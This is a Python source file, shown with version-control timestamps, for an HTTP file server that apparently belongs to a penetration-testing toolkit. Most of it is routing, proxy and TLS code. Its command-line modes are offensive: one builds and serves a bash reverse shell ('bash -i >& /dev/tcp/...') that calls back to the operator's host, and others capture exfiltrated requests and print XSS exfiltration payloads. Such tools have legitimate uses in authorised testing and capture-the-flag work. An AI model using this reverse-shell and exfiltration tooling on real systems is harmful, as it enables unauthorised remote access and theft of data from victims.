2020-09-27 14:00:20 +02:00
|
|
|
#!/usr/bin/env python
|
|
|
|
|
|
|
|
from http.server import BaseHTTPRequestHandler, HTTPServer
|
2021-05-31 14:13:01 +02:00
|
|
|
from urllib.parse import urlparse
|
2020-09-27 14:37:52 +02:00
|
|
|
import threading
|
2020-10-21 21:41:06 +02:00
|
|
|
import requests
|
2020-09-27 14:37:52 +02:00
|
|
|
import sys
|
2021-12-08 17:50:48 +01:00
|
|
|
import time
|
2020-10-15 14:35:16 +02:00
|
|
|
import os
|
|
|
|
import ssl
|
2021-05-12 15:58:19 +02:00
|
|
|
import util
|
|
|
|
import xss_handler
|
2020-09-27 14:00:20 +02:00
|
|
|
|
2020-09-27 14:37:52 +02:00
|
|
|
class FileServerRequestHandler(BaseHTTPRequestHandler):
    """Request handler that dispatches every HTTP method through do_GET.

    Routes are looked up on the owning server (``self.server``): exact matches
    in ``server.routes`` first, then prefix matches in ``server.prefix_routes``.
    Each route is a callable ``route(handler) -> (status, body_bytes, headers)``
    (shorter tuples are padded with defaults).
    """

    # Hop-by-hop / length-related headers we must not blindly copy from a
    # proxied upstream response, since we send our own Content-Length.
    BLACKLIST_HEADERS = ["transfer-encoding", "content-length", "content-encoding", "allow", "connection"]

    def __init__(self, *args, **kwargs):
        # No extra state; kept for symmetry / future extension.
        super().__init__(*args, **kwargs)

    def do_HEAD(self):
        # HEAD is handled like GET; do_GET suppresses the body for HEAD.
        self.do_GET()

    def do_POST(self):
        self.do_GET()

    def do_OPTIONS(self):
        self.do_GET()

    def onForward(self, base_path, target):
        """Proxy the current request to ``target``.

        ``base_path`` is the registered route prefix; the remainder of the
        request path is appended to ``target``. Returns a
        ``(status, body, headers)`` tuple like any other route.
        """
        # Strip the route prefix (keeping the leading slash) from the path.
        path = self.path[max(0, len(base_path) - 1):]

        # If the target URL already contains a path component that the request
        # repeats, avoid duplicating it in the rewritten URL.
        parts = urlparse(target)
        if path.startswith(parts.path):
            path = path[len(parts.path):]

        target_rewrite = target + path

        # Forward the request body, if any.
        contentLength = self.headers.get('Content-Length')
        data = None
        if contentLength and int(contentLength) > 0:
            data = self.rfile.read(int(contentLength))

        # Drop the incoming Host header so the upstream sees its own host.
        if "Host" in self.headers:
            del self.headers["Host"]

        method = self.command
        print(target, "=>", method, target_rewrite)

        res = requests.request(method, target_rewrite, headers=self.headers, data=data)
        return res.status_code, res.content, res.headers

    def find_route(self, path):
        """Return the route callable for ``path`` (404 fallback if none)."""
        if path in self.server.routes:
            return self.server.routes[path]

        for p, route in self.server.prefix_routes.items():
            if path.startswith(p):
                return route

        def not_found(req):
            return 404, b"", {}

        return not_found

    def do_GET(self):
        """Central dispatcher for all HTTP methods."""
        try:
            # While shutting down, answer the wake-up "dummy" requests with a
            # bare 200 so the serve loop can exit cleanly.
            if not self.server.is_running:
                self.send_response(200)
                self.end_headers()
                return

            path = self.server.cleanPath(self.path)
            route = self.find_route(path)
            # Guard against a route that returns None (treated as empty 200).
            result = route(self) or ()

            status_code = 200 if len(result) < 1 else result[0]
            data = b"" if len(result) < 2 else result[1]
            headers = {} if len(result) < 3 else result[2]

            if path in self.server.dumpRequests:
                headers["Access-Control-Allow-Origin"] = "*"

            headers["Content-Length"] = len(data)

            if len(headers) == 0:
                self.send_response(status_code)
            else:
                # send_response would log; replicate that (except for /dummy)
                # and then emit only the status line, since we send our own
                # header set below.
                if path != "/dummy":
                    self.log_request(status_code)
                self.send_response_only(status_code)

            for key, value in headers.items():
                if key.lower() not in self.BLACKLIST_HEADERS:
                    self.send_header(key, value)

            if self.command.upper() == "OPTIONS":
                self.send_header("Allow", "OPTIONS, GET, HEAD, POST")

            self.end_headers()

            # HEAD/OPTIONS responses carry no body.
            if data and self.command.upper() not in ["HEAD", "OPTIONS"]:
                self.wfile.write(data)

            # Optionally dump the full request (method, headers, body) for
            # exfiltration-style usage.
            if (path in self.server.dumpRequests or "/" in self.server.dumpRequests) and path != "/dummy":
                contentLength = self.headers.get('Content-Length')
                body = None

                if contentLength and int(contentLength) > 0:
                    body = self.rfile.read(int(contentLength))

                print("===== Connection from:", self.client_address[0])
                print("%s %s %s" % (self.command, self.path, self.request_version))
                print(str(self.headers).strip())
                if body:
                    print()
                    print(body)
                print("==========")
        except Exception as e:
            # Best-effort server: report and keep serving.
            print("Exception on handling http", str(e))

    def log_message(self, format, *args):
        # Only log when the owning server explicitly enabled it.
        if self.server.logRequests:
            super().log_message(format, *args)
|
2020-09-27 14:37:52 +02:00
|
|
|
|
|
|
|
class HttpFileServer(HTTPServer):
    """In-memory HTTP file server with routing, request dumping and proxying.

    Typical use: add routes/files, then ``start()`` (blocking) or
    ``startBackground()`` (thread), and ``stop()`` to shut down.
    """

    def __init__(self, addr, port):
        super().__init__((addr, port), FileServerRequestHandler)
        self.logRequests = False      # handler logging off by default
        self.routes = {}              # exact path -> route callable
        self.dumpRequests = []        # paths whose full request is printed
        self.prefix_routes = {}       # path prefix -> route callable
        self.is_running = True        # serve loop condition
        self.listen_thread = None     # set by startBackground()
        self.has_exited = False       # set once serve_forever() returns

    def cleanPath(self, path):
        """Normalize a route path: strip query string, force leading '/'."""
        if "?" in path:
            path = path[0:path.find("?")]

        if not path.startswith("/"):
            path = "/" + path

        return path.strip()

    def addFile(self, name, data, mimeType=None):
        """Serve ``data`` (str, bytes, or file-like) at ``/name``.

        The response always allows cross-origin access; ``mimeType`` sets the
        Content-Type header when given.
        """
        # Accept an open file-like object and consume it once.
        if hasattr(data, "read"):
            fd = data
            data = data.read()
            fd.close()

        if isinstance(data, str):
            data = data.encode("UTF-8")

        headers = {
            "Access-Control-Allow-Origin": "*",
        }

        if mimeType:
            # BUG FIX: previously assigned the headers dict itself here.
            headers["Content-Type"] = mimeType

        # return 200 - OK and data
        self.addRoute(name, lambda req: (200, data, headers))

    def add_file_path(self, path, name=None):
        """Serve the file at ``path`` (read lazily on each request)."""
        def readfile():
            with open(path, "rb") as f:
                return f.read()

        if name is None:
            name = os.path.basename(path)

        self.addRoute(name, lambda req: (200, readfile()))

    def load_directory(self, path, recursive=True, exclude_ext=[]):
        """Register every file below ``path`` under its relative path."""
        if not os.path.isdir(path):
            print("Not a directory:", path)
            return

        for dp, dn, filenames in os.walk(path):
            for f in filenames:
                file_path = os.path.join(dp, f)
                if not exclude_ext or os.path.splitext(file_path)[1] not in exclude_ext:
                    relative_path = file_path[len(path):]
                    self.add_file_path(file_path, relative_path)

    def dumpRequest(self, name):
        """Print full request details for any request hitting ``name``."""
        self.dumpRequests.append(self.cleanPath(name))

    def addRoute(self, path, func):
        self.routes[self.cleanPath(path)] = func

    def addPrefixRoute(self, path, func):
        self.prefix_routes[self.cleanPath(path)] = func

    def forwardRequest(self, path, target):
        """Proxy everything under ``path`` to the ``target`` URL."""
        self.addPrefixRoute(path, lambda req: req.onForward(path, target))

    def enableLogging(self):
        self.logRequests = True

    def enableSSL(self, keyFile="private.key", certFile="server.crt"):
        """Wrap the listening socket in TLS, generating a self-signed
        certificate (interactively, via openssl) when files are missing."""
        if not os.path.isfile(keyFile):
            print("Generating private key and certificate…")
            os.system("openssl req -new -x509 -keyout private.key -out server.crt -days 365 -nodes")
        elif not os.path.isfile(certFile):
            print("Generating certificate…")
            # BUG FIX: "-keyin" is not a valid `openssl req` option; "-key"
            # reuses the existing private key.
            os.system("openssl req -new -x509 -key private.key -out server.crt -days 365 -nodes")

        # ssl.wrap_socket was deprecated in 3.7 and removed in 3.12; use an
        # SSLContext (PROTOCOL_TLS_SERVER implies server_side and CERT_NONE).
        context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        context.load_cert_chain(certfile=certFile, keyfile=keyFile)
        self.socket = context.wrap_socket(self.socket, server_side=True)

    def startBackground(self):
        """Serve in a daemon-style background thread; returns the thread."""
        self.listen_thread = threading.Thread(target=self.serve_forever)
        self.listen_thread.start()
        return self.listen_thread

    def start(self):
        return self.serve_forever()

    def get_base_url(self):
        # BUG FIX: was defined without ``self`` and called undefined
        # ``gettype``, so every call raised; also rendered port 80 as
        # "http://addr80" instead of omitting it.
        addr, port = self.server_address
        port_part = "" if port == 80 else f":{port}"
        protocol = "https" if isinstance(self.socket, ssl.SSLSocket) else "http"
        return f"{protocol}://{addr}{port_part}"

    def stop(self):
        """Stop the serve loop and join the background thread, if any.

        ``handle_request`` blocks until a request arrives, so we poke the
        server with dummy requests to let it observe ``is_running == False``.
        """
        self.is_running = False
        time.sleep(1)

        try:
            # dummy request(s) to wake up the blocking handle_request
            for i in range(3):
                requests.get(f"{self.get_base_url()}/dummy")
                if self.has_exited:
                    break
                time.sleep(1)
        except Exception:
            # Best effort: the loop may already have exited.
            pass

        # Don't join from within the serve thread itself (deadlock), and
        # tolerate stop() being called without startBackground().
        if self.listen_thread and self.listen_thread != threading.current_thread():
            self.listen_thread.join()

    def serve_forever(self):
        self.has_exited = False
        while self.is_running:
            self.handle_request()
        self.has_exited = True
|
2021-06-05 14:24:35 +02:00
|
|
|
|
|
|
|
|
2020-09-27 14:37:52 +02:00
|
|
|
if __name__ == "__main__":
    # CLI modes: serve a reverse shell, dump incoming requests, proxy a URL,
    # or print an XSS exfiltration payload.
    if len(sys.argv) < 2 or sys.argv[1] not in ["shell", "dump", "proxy", "xss"]:
        print("Usage: %s [shell,dump,proxy,xss]" % sys.argv[0])
        sys.exit(1)  # sys.exit instead of the interactive-only exit()

    httpPort = 80
    fileServer = HttpFileServer("0.0.0.0", httpPort)
    ipAddress = util.get_address()

    if sys.argv[1] == "shell":
        # Serve a bash reverse shell pointing back at this host.
        listenPort = 4444 if len(sys.argv) < 3 else int(sys.argv[2])
        rev_shell = "bash -i >& /dev/tcp/%s/%d 0>&1" % (ipAddress, listenPort)
        fileServer.addFile("shell.sh", rev_shell)
        fileServer.dumpRequest("/")
        print("Reverse Shell URL: http://%s/shell.sh" % ipAddress)
    elif sys.argv[1] == "dump":
        # Print every incoming request in full.
        fileServer.dumpRequest("/")
        print("Exfiltrate data using: http://%s/" % ipAddress)
    elif sys.argv[1] == "proxy":
        # Forward /proxy/* to the given URL.
        url = "https://google.com" if len(sys.argv) < 3 else sys.argv[2]
        fileServer.forwardRequest("/proxy", url)
        print("Exfiltrate data using: http://%s/proxy" % ipAddress)
    elif sys.argv[1] == "xss":
        # Renamed from `type` to avoid shadowing the builtin.
        payload_type = "img" if len(sys.argv) < 3 else sys.argv[2]
        xss = xss_handler.generatePayload(payload_type, ipAddress, httpPort)
        print("Exfiltrate data using:")
        print(xss)

    fileServer.start()
|